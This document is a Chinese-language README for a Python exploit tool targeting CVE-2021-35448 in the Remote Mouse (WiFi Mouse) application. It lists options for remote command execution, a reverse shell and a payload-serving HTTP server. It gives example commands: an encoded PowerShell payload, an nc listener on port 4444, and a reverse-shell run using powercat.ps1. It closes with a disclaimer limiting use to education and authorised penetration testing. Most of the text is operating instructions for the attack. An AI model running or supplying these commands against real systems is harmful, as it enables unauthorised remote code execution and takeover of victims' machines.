此利用工具针对 Remote Mouse(原名 WiFi Mouse)应用程序中的 CVE-2021-35448 漏洞。
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target:目标 IP 地址(必填)-p, --payload:自定义执行的命令-r, --reverse:反向 Shell,格式为 IP:PORT-l, --http:本地 HTTP 服务器,格式为 IP:PORT(与 -r 配合使用)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# 终端 1 - 监听
nc -nlvp 4444
# 终端 2 - 利用
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py:主要利用脚本powercat.ps1:用于反向 Shell 的 PowerShell 脚本⚠️ 仅限道德使用 ⚠️
此工具仅用于教育目的和授权的渗透测试。未经授权使用此利用工具是非法的,并可能导致法律起诉。
为教育和道德渗透测试目的而开发。
最后更新:2025